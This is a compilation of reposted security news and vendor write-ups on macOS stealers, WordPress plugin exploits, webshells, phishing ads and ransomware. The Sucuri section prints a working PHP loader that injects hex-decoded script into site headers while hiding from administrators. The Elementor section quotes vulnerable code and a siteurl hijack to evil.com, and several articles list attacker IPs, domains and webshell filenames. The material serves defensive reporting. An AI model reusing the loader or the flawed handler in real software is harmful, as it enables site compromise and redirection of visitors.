New Atomic macOS Malware Steals Keychain Passwords and Crypto Wallets

Threat actors are advertising a new information stealer for the Apple macOS operating system called Atomic macOS Stealer (or AMOS) on Telegram for $1,000 per month, joining the likes of MacStealer.

“The Atomic macOS Stealer can steal various types of information from the victim’s machine, including Keychain passwords, complete system information, files from the desktop and documents folder, and even the macOS password,” Cyble researchers said in a technical report.

Among other features include its ability to extract data from web browsers and cryptocurrency wallets like Atomic, Binance, Coinomi, Electrum, and Exodus. Threat actors who purchase the stealer from its developers are also provided a ready-to-use web panel for managing the victims.

The malware takes the form of an unsigned disk image file (Setup.dmg) that, when executed, urges the victim to enter their system password on a bogus prompt to escalate privileges and carry out its malicious activities — a technique also adopted by MacStealer.

The initial intrusion vector used to deliver the malware is immediately not clear, although it’s possible that users are manipulated into downloading and executing it under the guise of legitimate software.

The Atomic stealer artifact, submitted to VirusTotal on April 24, 2023, also bears the name “Notion-7.0.6.dmg,” suggesting that it’s being propagated as the popular note-taking app. Other samples unearthed by the MalwareHunterTeam have been distributed as “Photoshop CC 2023.dmg” and “Tor Browser.dmg.”

“Malware such as the Atomic macOS Stealer could be installed by exploiting vulnerabilities or hosting on phishing websites,” Cyble noted.

Atomic then proceeds to harvest system metadata, files, iCloud Keychain, as well as information stored in web browsers (e.g., passwords, autofill, cookies, credit card data) and crypto wallet extensions, all of which are compressed into a ZIP archive and sent to a remote server. The ZIP file of the compiled information is then sent to pre-configured Telegram channels.

The development is another sign that macOS is increasingly becoming a lucrative target beyond nation-state hacking groups to deploy stealer malware, making it imperative that users only download and install software from trusted sources, enable two-factor authentication, review app permissions, and refrain from opening suspicious links received via emails or SMS messages.

Second Variant of Atomic Stealer Found

SentinelOne, in a follow-up analysis published earlier this week, disclosed details of a previously unreported second variant of Atomic Stealer and the use of Google Ads as a distribution vector for the malware.

The new version masquerades as a game installer and incorporates a “larger number of functions focusing on Firefox and Chromium browsers” but at the same time leverages game-related lures to target cryptocurrency users.

Additionally, the presence of grammatical and spelling errors is an indication that the developer’s first language is likely not English. The identity of the threat actor behind Atomic Stealer is currently unknown.

Another significant trait of Atomic Stealer is its lack of persistence mechanism due to a macOS Ventura feature that alerts users when new apps or services are added to the list of “login items” that are automatically executed when the device starts. Instead, it opts to steal as much information as possible in what’s a smash-and-grab attack.

“Infostealers targeted at Mac users have become increasingly viable for threat actors now that Macs have reached widespread use in organizations, both for work and personal use,” SentinelOne researcher Phil Stokes said.

“As many Mac devices lack good external security tools that can provide both visibility and protection, there is plenty of opportunity for threat actors to develop and market tools to aid cybercriminals.”

Hackers exploit WordPress plugin flaw that gives full control of millions of sites

Elementor Pro fixed the vulnerability, but not everyone has installed the patch.

Hackers are actively exploiting a critical vulnerability in a widely used WordPress plugin that gives them the ability to take complete control of millions of sites, researchers said.

The vulnerability, which carries a severity rating of 8.8 out of a possible 10, is present in Elementor Pro, a premium plugin running on more than 12 million sites powered by the WordPress content management system. Elementor Pro allows users to create high-quality websites using a wide range of tools, one of which is WooCommerce, a separate WordPress plugin. When those conditions are met, anyone with an account on the site—say a subscriber or customer—can create new accounts that have full administrator privileges.

The vulnerability was discovered by Jerome Bruandet, a researcher with security firm NinTechNet. Last week, Elementor, the developer of the Elementor Pro plugin, released version 3.11.7, which patched the flaw. In a post published on Tuesday, Bruandet wrote:

An authenticated attacker can leverage the vulnerability to create an administrator account by enabling registration (users_can_register) and setting the default role (default_role) to “administrator”, change the administrator email address (admin_email) or, as shown below, redirect all traffic to an external malicious website by changing siteurl among many other possibilities:

MariaDB [example]> SELECT * FROM `wp_options` WHERE `option_name`='siteurl';
+-----------+-------------+------------------+----------+
| option_id | option_name | option_value     | autoload |
+-----------+-------------+------------------+----------+
|		 1 | siteurl     | https://evil.com | yes 	 |
+-----------+-------------+------------------+----------+
1 row in set (0.001 sec)

Now, researchers with a separate security firm, PatchStack, report that the vulnerability is under active exploitation. Attacks are coming from a variety of IP addresses, including:

  • 193.169.194.63
  • 193.169.195.64
  • 194.135.30.6

Files uploaded to compromised sites often have the following names:

  • wp-resortpack.zip
  • wp-rate.php
  • lll.zip

URLs of compromised sites are often being changed to:

  • away[dot]trackersline[dot]com

The broken access control vulnerability stems from Elementor Pro’s use of the “elementor-pro/modules/woocommerce/module.php” component. When WooCommerce is running, this script registers the following AJAX actions:

/**
 * Register Ajax Actions.
 *
 * Registers ajax action used by the Editor js.
 *
 * @since 3.5.0
 *
 * @param Ajax $ajax
 */
public function register_ajax_actions( Ajax $ajax ) {
   // `woocommerce_update_page_option` is called in the editor save-show-modal.js.
   $ajax->register_ajax_action( 'pro_woocommerce_update_page_option', [ $this, 'update_page_option' ] );
   $ajax->register_ajax_action( 'pro_woocommerce_mock_notices', [ $this, 'woocommerce_mock_notices' ] );
}

and

/**
 * Update Page Option.
 *
 * Ajax action can be used to update any WooCommerce option.
 *
 * @since 3.5.0
 *
 * @param array $data
 */
public function update_page_option( $data ) {
   update_option( $data['option_name'], $data['editor_post_id'] );
}

The update_option function “is supposed to allow the Administrator or the Shop Manager to update some specific WooCommerce options, but user input aren’t validated and the function lacks a capability check to restrict its access to a high privileged user only,” Bruandet explained. He continued:

Elementor uses its own AJAX handler to manage most of its AJAX actions, including pro_woocommerce_update_page_option, with the global elementor_ajax action. It is located in the “elementor/core/common/modules/ajax/module.php” script of the free version (which is required to run Elementor Pro) :

/**
 * Handle ajax request.
 *
 * Verify ajax nonce, and run all the registered actions for this request.
 *
 * Fired by `wp_ajax_elementor_ajax` action.
 *
 * @since 2.0.0
 * @access public
 */
public function handle_ajax_request() {
   if ( ! $this->verify_request_nonce() ) {
  	$this->add_response_data( false, esc_html__( 'Token Expired.', 'elementor' ) )
     	->send_error( Exceptions::UNAUTHORIZED );
   }
   ...

Anyone using Elementor Pro should ensure they’re running 3.11.7 or later, as all previous versions are vulnerable. It’s also a good idea for these users to check their sites for the signs of infection listed in the PatchStack post.

Source: https://arstechnica.com/information-technology/2023/03/hackers-exploit-wordpress-plugin-flaw-that-gives-full-control-of-millions-of-sites

GoDaddy: Hackers stole source code, installed malware in multi-year breach

Web hosting giant GoDaddy says it suffered a breach where unknown attackers have stolen source code and installed malware on its servers after breaching its cPanel shared hosting environment in a multi-year attack.

While GoDaddy discovered the security breach following customer reports in early December 2022 that their sites were being used to redirect to random domains, the attackers had access to the company’s network for multiple years.

“Based on our investigation, we believe these incidents are part of a multi-year campaign by a sophisticated threat actor group that, among other things, installed malware on our systems and obtained pieces of code related to some services within GoDaddy,” the hosting firm said in an SEC filing.

The company says that previous breaches disclosed in November 2021 and March 2020 are also linked to this multi-year campaign.

The November 2021 incident led to a data breach affecting 1.2 million Managed WordPress customers after attackers breached GoDaddy’s WordPress hosting environment using a compromised password.

They gained access to the email addresses of all impacted customers, their WordPress Admin passwords, sFTP and database credentials, and SSL private keys of a subset of active clients.

After the March 2020 breach, GoDaddy alerted 28,000 customers that an attacker used their web hosting account credentials in October 2019 to connect to their hosting account via SSH.

GoDaddy is now working with external cybersecurity forensics experts and law enforcement agencies worldwide as part of an ongoing investigation into the root cause of the breach.

Links to attacks targeting other hosting companies

GoDaddy says it also found additional evidence linking the threat actors to a broader campaign targeting other hosting companies worldwide over the years.

“We have evidence, and law enforcement has confirmed, that this incident was carried out by a sophisticated and organized group targeting hosting services like GoDaddy,” the hosting company said in a statement.

“According to information we have received, their apparent goal is to infect websites and servers with malware for phishing campaigns, malware distribution and other malicious activities.”

GoDaddy is one of the largest domain registrars, and it also provides hosting services to over 20 million customers worldwide.

A GoDaddy spokesperson was not immediately available for comment when contacted by BleepingComputer earlier today.

Source: GoDaddy: Hackers stole source code, installed malware in multi-year breach (bleepingcomputer.com) and GoDaddy says a multi-year breach hijacked customer websites and accounts | Ars Technica

.

Malicious Google ads sneak AWS phishing sites into search results

A new phishing campaign targeting Amazon Web Services (AWS) logins is abusing Google ads to sneak phishing sites into Google Search to steal your login credentials.

The campaign was discovered by Sentinel Labs, whose analysts observed the malicious search results on January 30, 2023. The bad ads ranked second when searching for “aws,” right behind Amazon’s own promoted search result.

Initially, the threat actors linked the ad directly to the phishing page. However, at a later phase, they added a redirection step, likely to evade detection by Google’s ad fraud detection systems.

The malicious Google ads take the victim to a blogger website (“us1-eat-a-w-s.blogspot[.]com”) under the attackers’ control, which is a copy of a legitimate vegan food blog. 

The site uses ‘window.location.replace’ to automatically redirect the victim to a new website that hosts the fake AWS login page, made to appear authentic.

The victim is prompted to select if they are a root or IAM user and then enter their email address and password. This option helps the threat actors categorize the stolen data into two categories of value and utility.

The phishing domains seen by Sentinel Labs are:

  • aws1-console-login[.]us
  • aws2-console-login[.]xyz
  • aws1-ec2-console[.]com
  • aws1-us-west[.]info

An interesting feature of the phishing pages is that their author has included a JavaScript function to disable right clicks, middle mouse buttons, or keyboard shortcuts.

Sentinel Labs says this is likely a mechanism to prevent users from navigating away from the page, either purposefully or by mistake.

The security firm reports seeing Portuguese used as a language in the JavaScript code comments and variables, while the root page of the blogger domain mimics a Brazilian dessert business. Finally, the Whois details used for registering the domains point to a Brazilian person.

Sentinel Labs reported the abuse to CloudFlare, which protected the phishing sites, and the internet company quickly shut down the account. However, the malicious Google Ads remain, even if the sites they link to are no longer online.

Google Ads have been under massive abuse from cybercriminals of all kinds lately, serving as an alternative method to reach potential victims.

These ads have been used lately for phishing password manager accounts, achieving initial network compromise for ransomware deployment, and malware distribution masquerading legitimate software tools.

Last week, Sentinel Labs discovered a campaign that uses virtualization technology together with Google Ads to spread malware that makes it harder to detect by antivirus tools.

Source: Malicious Google ads sneak AWS phishing sites into search results (bleepingcomputer.com) and Risky Biz News: Google Search and Ads have a major malware problem (substack.com)

Multiple Critical Vulnerabilities Fixed In LearnPress Plugin Version <= 4.1.7.3.2

If you’re a LearnPress user, please update the plugin to at least version 4.2.0.

The plugin LearnPress (versions 4.1.7.3.2 and below), which has over 100,000 active installations is a comprehensive WordPress LMS Plugin for WordPress. This is one of the most popular WordPress LMS Plugins which can be used to easily create & sell courses online. We can create a course curriculum with lessons & quizzes included which is managed with an easy-to-use interface for users.

This plugin suffers from multiple critical vulnerabilities. These vulnerabilities allow any unauthenticated users to inject a SQL query to the database and perform local file inclusion. We also found another SQL injection that would need a user with at least “Contributor” role to be exploited. The described vulnerability was fixed in version 4.2.0.

The security vulnerability in LearnPress
Unauthenticated Local File Inclusion (CVE-2022-47615)

The vulnerable code responsible for this vulnerability is located on inc/rest-api/v1/frontend/class-lp-rest-courses-controller.php function list_courses . This function is used to handle API request to lp/v1/courses/archive-course .

Source and more details:

Holiday Attack Spikes Target Ancient Vulnerabilities and Hidden Webshells

Source and more details: WordFence

Winter brings a number of holidays in a short period of time, and many organizations shut down or run a skeleton crew for a week or more at the end of the year and beginning of the new year. This makes it easier for would-be attackers to find success as systems are not as closely monitored. This means that during major holidays it is not uncommon to see spikes in attack attempts.

We observed spikes in attack traffic for two of our firewall rules over the Christmas and New Year holidays, which are discussed in more detail below. The spikes in these rules look rather different when compared to each other. What they have in common is that the best defenses are proactively securing your website and keeping WordPress core, themes, and plugins updated.

Targeted Spikes: Downloads Manager Plugin
There were two spikes specifically targeting the Downloads Manager plugin by Giulio Ganci. The first spike was on December 24, 2022, with a second spike on January 4, 2023. In the 30-day reporting period, only 17 attempts to scan for readme.txt or debug.log files did not target the Downloads Manager plugin. On average, the rule that blocks these scans typically blocks an average of 7,515,876 scan attempts per day. The first spike saw 92,546,995 scan attempts, and the second spike soared to 118,780,958 scan attempts in a single day.

chart of blocked attack attempts targeting the Downloads Manager plugin by day

Over the reporting period, we tracked 466,827 attacking IP addresses. These IP addresses attempted to exploit vulnerabilities on 2,663,905 protected websites. The top 10 IP addresses were responsible for 90,693,836 exploit attempts over the course of the reporting period.

chart of the top ten IP addresses targeting the Downloads Manager plugin

The observed user-agent strings were largely known legitimate user-agents, though some appear to have been modified. The top ten user-agents accounted for 306,845,888 of the total exploit attempts during this time period.

During these spikes, the scans were specifically looking for readme.txt files within the /wp-content/plugins/downloads-manager/ directory of the website. When found, they are primarily attempting to upload the Mister Spy Bot V7 shell with a filename similar to up__jpodv.php, where the last five characters of the name are random letters, or the Saber BOT V1 shell with a filename of saber.php as the malicious payload.

The vulnerability would-be attackers are attempting to exploit is an arbitrary file upload vulnerability found in Downloads Manager <= 0.2. A lack of adequate validation made it possible for files to be uploaded and run on a vulnerable website. This could lead to remote code execution on some sites. The vulnerability was publicly published in 2008, and was never patched. The plugin has since been closed and is no longer available. If this plugin is still being used, it should be removed immediately. Take note that this is not the WordPress Download Manager plugin by W3 Eden, which is still actively being developed and should simply be kept updated with the latest releases as they are published.

Mister Spy Bot V7
The Mister Spy shell returns some basic information about the operating system the website is running on, and the location of the site root on that system, and allows for files to be uploaded. In addition to these features, Mister Spy payloads typically include a reverse shell that allows a successful attacker to obtain additional information about the content management system being used on the website, install additional shells, deface the website, register malicious users on the website, and collect configuration details, among other features.

screenshot of Mister Spy Bot Webshell

Saber BOT V1
Saber BOT gives a successful attacker the ability to view files, and modify their permissions and filenames, as well as edit or delete the files. The current path is displayed in the web interface, and an upload form is provided as well. While not as sophisticated as Mister Spy Bot V7, Saber BOT V1 can still lead to remote code execution due to the file upload capabilities.

Screenshot of Saber BOT webshell

Untargeted Spikes: Known User-Agents
The attack attempts we saw that did not target a specific plugin were blocked due to the use of known malicious user-agent strings. These spikes were not as pronounced as the targeted spikes we saw and occurred on slightly different days. The total number of blocked attacks rose beginning on December 22, 2022, and stayed slightly higher throughout the remainder of the reporting period. Within this time we also saw three spikes on December 23rd and 24th, December 29th, and January 2nd. The January 2, 2023 peak was the largest peak, reaching 183,097,778 blocked attack attempts. This put the peak at nearly three times as many attempts as the average of 66,669,317 blocked per day.

chart of blocked attack attempts by known malicious user-agents by day

The attack attempts blocked by this firewall rule were much more varied, and did not show an increase in specific payloads or intrusion vectors. Instead, the increase appears to have been a simple rise in the volume of attack attempts across all attack types from actors using known malicious user-agents. One of the most common attack types blocked for using a known malicious user-agent string is probing for hidden webshells.

Cyber Observables
The following observables can be used in conjunction with other indicators as an indication that a compromise may have occurred.

Filenames
The filename for Mister Spy Bot V7 follows a pattern of up__xxxxx.php, where xxxxx is replaced with a random set of five lowercase letters. Saber BOT V1 was consistently named saber.php in these spikes.

up__jpodv.php
up__bxyev.php
up__izlxc.php
saber.php

Conclusion
Spikes in exploit and other attack attempts are common around holidays, as is highlighted by spikes we observed in probing attempts against the Downloads Manager plugin and blocked known malicious user-agents. These spikes occurred on or near the Christmas and New Year holidays. Fortunately for Wordfence users, firewall rules were already in place to block these attack attempts, even for Wordfence Free users. In addition to having a firewall and malware scanning in place, it is also important to ensure that all components of a website are updated with the latest security releases, and vulnerable plugins with no updates should be removed.

New Linux malware uses 30 plugin exploits to backdoor WordPress sites

A previously unknown Linux malware has been exploiting 30 vulnerabilities in multiple outdated WordPress plugins and themes to inject malicious JavaScript.

According to a report by antivirus vendor Dr. Web, the malware targets both 32-bit and 64-bit Linux systems, giving its operator remote command capabilities.

The main functionality of the trojan is to hack WordPress sites using a set of hardcoded exploits that are run successively, until one of them works.

The targeted plugins and themes are the following:

  • WP Live Chat Support Plugin
  • WordPress – Yuzo Related Posts
  • Yellow Pencil Visual Theme Customizer Plugin
  • Easysmtp
  • WP GDPR Compliance Plugin
  • Newspaper Theme on WordPress Access Control (CVE-2016-10972)
  • Thim Core
  • Google Code Inserter
  • Total Donations Plugin
  • Post Custom Templates Lite
  • WP Quick Booking Manager
  • Faceboor Live Chat by Zotabox
  • Blog Designer WordPress Plugin
  • WordPress Ultimate FAQ (CVE-2019-17232 and CVE-2019-17233)
  • WP-Matomo Integration (WP-Piwik)
  • WordPress ND Shortcodes For Visual Composer
  • WP Live Chat
  • Coming Soon Page and Maintenance Mode
  • Hybrid

If the targeted website runs an outdated and vulnerable version of any of the above, the malware automatically fetches malicious JavaScript from its command and control (C2) server, and injects the script into the website site.

Infected pages act as redirectors to a location of the attacker’s choosing, so the scheme works best on abandoned sites.

These redirections may serve in phishing, malware distribution, and malvertising campaigns to help evade detection and blocking. That said, the operators of the auto-injector might be selling their services to other cybercriminals.

An updated version of the payload that Dr. Web observed in the wild also targets the following WordPress add-ons:

  • Brizy WordPress Plugin
  • FV Flowplayer Video Player
  • WooCommerce
  • WordPress Coming Soon Page
  • WordPress theme OneTone
  • Simple Fields WordPress Plugin
  • WordPress Delucks SEO plugin
  • Poll, Survey, Form & Quiz Maker by OpinionStage
  • Social Metrics Tracker
  • WPeMatico RSS Feed Fetcher
  • Rich Reviews plugin

The new add-ons targeted by the new variant indicate that the development of the backdoor is active at the moment.

Dr. Web also mentions that both variants contain functionality that is currently inactive, which would allow brute-forcing attacks against website administrator accounts.

Defending against this threat requires admins of WordPress websites to update to the latest available version the themes and plugins running on the site and replace those that are no longer developed with alternatives that being supported.

Using strong passwords and activating the two-factor authentication mechanism should help ensure protection against brute-force attacks.

Source: https://www.bleepingcomputer.com/news/security/new-linux-malware-uses-30-plugin-exploits-to-backdoor-wordpress-sites/

New Ransom Payment Schemes Target Executives, Telemedicine

Ransomware groups are constantly devising new methods for infecting victims and convincing them to pay up, but a couple of strategies tested recently seem especially devious. The first centers on targeting healthcare organizations that offer consultations over the Internet and sending them booby-trapped medical records for the “patient.” The other involves carefully editing email inboxes of public company executives to make it appear that some were involved in insider trading.

Alex Holden is founder of Hold Security, a Milwaukee-based cybersecurity firm. Holden’s team gained visibility into discussions among members of two different ransom groups: CLOP (a.k.a. “Cl0p” a.k.a. “TA505“), and a newer ransom group known as Venus.

Last month, the U.S. Department of Health and Human Services (HHS) warned that Venus ransomware attacks were targeting a number of U.S. healthcare organizations. First spotted in mid-August 2022, Venus is known for hacking into victims’ publicly-exposed Remote Desktop services to encrypt Windows devices.

Holden said the internal discussions among the Venus group members indicate this gang has no problem gaining access to victim organizations.

“The Venus group has problems getting paid,” Holden said. “They are targeting a lot of U.S. companies, but nobody wants to pay them.”

Which might explain why their latest scheme centers on trying to frame executives at public companies for insider trading charges. Venus indicated it recently had success with a method that involves carefully editing one or more email inbox files at a victim firm — to insert messages discussing plans to trade large volumes of the company’s stock based on non-public information.

“We imitate correspondence of the [CEO] with a certain insider who shares financial reports of his companies through which your victim allegedly trades in the stock market, which naturally is a criminal offense and — according to US federal laws [includes the possibility of up to] 20 years in prison,” one Venus member wrote to an underling.

“You need to create this file and inject into the machine(s) like this so that metadata would say that they were created on his computer,” they continued. “One of my clients did it, I don’t know how. In addition to pst, you need to decompose several files into different places, so that metadata says the files are native from a certain date and time rather than created yesterday on an unknown machine.”

Holden said it’s not easy to plant emails into an inbox, but it can be done with Microsoft Outlook .pst files, which the attackers may also have access to if they’d already compromised a victim network.

“It’s not going to be forensically solid, but that’s not what they care about,” he said. “It still has the potential to be a huge scandal — at least for a while — when a victim is being threatened with the publication or release of these records.”

The Venus ransom group’s extortion note. Image: Tripwire.com

Holden said the CLOP ransomware gang has a different problem of late: Not enough victims. The intercepted CLOP communication seen by KrebsOnSecurity shows the group bragged about twice having success infiltrating new victims in the healthcare industry by sending them infected files disguised as ultrasound images or other medical documents for a patient seeking a remote consultation.

The CLOP members said one tried-and-true method of infecting healthcare providers involved gathering healthcare insurance and payment data to use in submitting requests for a remote consultation on a patient who has cirrhosis of the liver.

“Basically, they’re counting on doctors or nurses reviewing the patient’s chart and scans just before the appointment,” Holden said. “They initially discussed going in with cardiovascular issues, but decided cirrhosis or fibrosis of the liver would be more likely to be diagnosable remotely from existing test results and scans.”

While CLOP as a money making collective is a fairly young organization, security experts say CLOP members hail from a group of Threat Actors (TA) known as “TA505,” which MITRE’s ATT&CK database says is a financially motivated cybercrime group that has been active since at least 2014. “This group is known for frequently changing malware and driving global trends in criminal malware distribution,” MITRE assessed.

In April, 2021, KrebsOnSecurity detailed how CLOP helped pioneer another innovation aimed at pushing more victims into paying an extortion demand: Emailing the ransomware victim’s customers and partners directly and warning that their data would be leaked to the dark web unless they can convince the victim firm to pay up.

Security firm Tripwire points out that the HHS advisory on Venus says multiple threat actor groups are likely distributing the Venus ransomware. Tripwire’s tips for all organizations on avoiding ransomware attacks include:

  • Making secure offsite backups.
  • Running up-to-date security solutions and ensuring that your computers are protected with the latest security patches against vulnerabilities.
  • Using hard-to-crack unique passwords to protect sensitive data and accounts, as well as enabling multi-factor authentication.
  • Encrypting sensitive data wherever possible.
  • Continuously educating and informing staff about the risks and methods used by cybercriminals to launch attacks and steal data.

While the above tips are important and useful, one critical area of ransomware preparedness overlooked by too many organizations is the need to develop — and then periodically rehearse — a plan for how everyone in the organization should respond in the event of a ransomware or data ransom incident. Drilling this breach response plan is key because it helps expose weaknesses in those plans that could be exploited by the intruders.

As noted in last year’s story Don’t Wanna Pay Ransom Gangs? Test Your Backups, experts say the biggest reason ransomware targets and/or their insurance providers still pay when they already have reliable backups of their systems and data is that nobody at the victim organization bothered to test in advance how long this data restoration process might take.

“Suddenly the victim notices they have a couple of petabytes of data to restore over the Internet, and they realize that even with their fast connections it’s going to take three months to download all these backup files,” said Fabian Wosar, chief technology officer at Emsisoft. “A lot of IT teams never actually make even a back-of-the-napkin calculation of how long it would take them to restore from a data rate perspective.”

Source: https://krebsonsecurity.com/2022/12/new-ransom-payment-schemes-target-executives-telemedicine/

Infected WordPress Plugins Redirect to Push Notification Scam

Attackers are always finding unique ways to avoid detection. Our teams regularly find malware on compromised websites which have been obfuscated to make it more difficult for webmasters to detect or understand. Obfuscation can take many forms, such as encrypting code or using complex algorithms to hide the true nature of the malicious contents. For example, many malware samples we detect are encoded into base64 to confuse website owners and evade detection.

But during a recent investigation, I stumbled across a rather interesting piece of malware using a more complex form of obfuscation. Instead of leveraging the typical base64 encoding to evade detection, the attacker was adding variations of a PHP function to normal plugin files which decoded hex2dec from a second file containing a hexadecimal payload.

Let’s take a closer look.

Unwanted redirects to fake captcha scam

A new client was complaining that whenever a site visitor clicked anywhere on their website, a browser tab was opened which redirected the victim to the following spammy web page: hxxps://1.guesswhatnews[.]com/not-a-robot/index.html

Redirect to push notification scam with fake captcha
Fake captcha displayed to redirected website visitors.

The spam website was resolving to an IP address https://urlscan.io/ip/45.133.44.20 employed by a shady ad network mainly used for porn websites.

An inspection of the compromised web page revealed a malicious JavaScript injection as the source of the redirect, which had been injected into random plugin files on the compromised website.

Malicious JavaScript injected into WordPress plugins via _inc.tmp

As it turns out, our remediation teams have recently noticed an influx of tickets for WordPress websites that have the following code injected into random plugins:

if ((is_admin() || (function_exists('get_hex_cache'))) !== true) {
        add_action('wp_head', 'get_hex_cache', 12);

        function get_hex_cache()
        {
            return print(@hex2bin( '3c7' . (file_get_contents(__DIR__  .'/_inc.tmp'))));
        }
    }

This PHP code injects the decoded contents of _inc.tmp (found in the same plugin directory) into the header section of the site’s WordPress pages.

To accomplish this, it adds the get_hex_cache function to the wp_head hook. This hook is only added once, even when more than one plugin is infected. It’s also worth noting that the malware is not activated for site administrators.

The _inc.tmp file contains a 51Kb-long sequence of digits:

The _inc.tmp file containing 51Kb-long sequence of digits:

It’s a hexadecimally encoded binary string. The malware appends 3c7 at the beginning of the string and decodes using the hex2bin PHP function.

The decoded results contain a <script> tag populated with obfuscated JavaScript code, which is injected into WordPress pages.

Example of the injected malicious JavaScript
Example of the injected script

The code begins with “function _0x18b4(){const _0x188f70=”. And yet another interesting feature of this injection is the data-group=”lists” parameter of the script tag. A quick check with PublicWWW revealed over 170 websites infected with this particular piece of malware (at the time of writing).

Furthermore, the script adds a listener to the whole page’s onclick event. Whenever a site visitor clicks on any link, it changes the link to hxxps://1.guesswhatnews[.]com/not-a-robot/index.html?var=siteid&ymid=clickid&rc=0&mrc=3&fsc=0&zoneid=1947429&tbz=1947431

Evading detection from dev tools

To hide the malicious activity from prying eyes, the script doesn’t do anything if it detects open Developer Tools. We’ve seen this behavior quite often in MageCart malware, however this script uses a more complex approach to detecting dev tools which relies on multiple alternative methods.

Here is a list of some of the function names this malware uses to make these checks:

  • checkByImageMethod
  • checkDevByScreenResize
  • detectDevByKeyboard
  • checkByFirebugMethod
  • checkByProfileMethod
Malware detects developer tools

Whenever the malware detects that dev tools are enabled, then the redirect doesn’t occur and malicious behavior is much harder to find upon inspection.

Mitigation Steps

Obfuscation can make it challenging for website owners to detect or pinpoint the source of malicious behavior on their website. Fortunately, a number of free and paid tools exist to help monitor for indicators of compromise.

Let’s take a look at some of the ways you can mitigate risk of infection for your website.

  • Scan your website for malware regularly and keep an eye out for infections at both the client and server level.
  • Install the latest software updates and patches for your website as soon as they become available. That includes core CMS, plugins, themes, and other extensible components.
  • Leverage a web application firewall to virtually patch known vulnerabilities, block bad bots, and mitigate brute force attacks.
  • Harden your website by restricting access to admin pages and using strong, unique passwords for all of your website’s accounts.
  • Use file integrity monitoring to detect any unexpected changes in your environment.

Source: https://blog.sucuri.net/2022/12/infected-wordpress-plugins-redirect-to-push-notification-scam.html

This broken ransomware can’t decrypt your files, even if you pay the ransom

Researchers warn this badly built ransomware will destroy your files, so don’t pay up.

Victims of a recently uncovered form of ransomware are being warned not to pay the ransom demand, simply because the ransomware isn’t able to decrypt files – it just destroys them instead. 

Coded in Python, Cryptonite ransomware first appeared in October as part of a free-to-download open-source toolkit – available to anyone with the skills required to deploy it in attacks against Microsoft Windows systems, with phishing attacks believed to be the most common means of delivery.

But analysis of Cryptonite by cybersecurity researchers at Fortinet has found that the ransomware only has “barebones” functionality and doesn’t offer a means of decrypting files at all, even if a ransom payment is made. 

Instead, Cryptonite effectively acts as wiper malware, destroying the encrypted files, leaving no way of retrieving the data. 

But rather than this being an intentionally malicious act of destruction by design, researchers suggest that the reason Cryptonite does this is because the ransomware has been poorly put together.  

A basic design and what’s described as a “lack of quality assurance” means the ransomware doesn’t work correctly because a flaw in the way it’s been put together means if Cryptonite crashes or is just closed, it leaves no way to recover encrypted files. 

There’s also no way to run it in decryption-only mode – so every time the ransomware is run, it re-encrypts everything with a different key. This means that, even if there was a way to recover the files, the unique key probably wouldn’t work – leaving no way to recover the encrypted data. 

“This sample demonstrates how a ransomware’s weak architecture and programming can quickly turn it into a wiper that does not allow data recovery,” said Gergely Révay, security researcher at Fortinet’s FortiGuard Labs. 

“Although we often complain about the increasing sophistication of ransomware samples, we can also see that oversimplicity and a lack of quality assurance can also lead to significant problems,” he added. 

It’s the victim of the ransomware attack that feels those problems, as they’re left with no means of restoring their network – even if they’ve made a ransom payment.  

The case of Cryptonite ransomware also serves as a reminder that paying a ransom is never a guarantee that the cyber criminals will provide a decryption key, or if it will work properly.   

Cyber agencies, including CISA, the FBI and the NCSC, recommend against paying the ransom because it only serves to embolden and encourage cyber criminals, particularly if they can acquire ransomware at a low cost or for free. 

The slightly good news is that it’s now harder for wannabe cyber criminals to get their hands on Cryptonite, as the original source code has been removed from GitHub. 

In addition to this, the simple nature of the ransomware also means that it’s easy for antivirus software to detect – so it’s recommended antivirus software is installed and kept up to date. 

Source: https://www.zdnet.com/article/this-badly-made-ransomware-cant-decrypt-your-files-even-if-you-pay-the-ransom/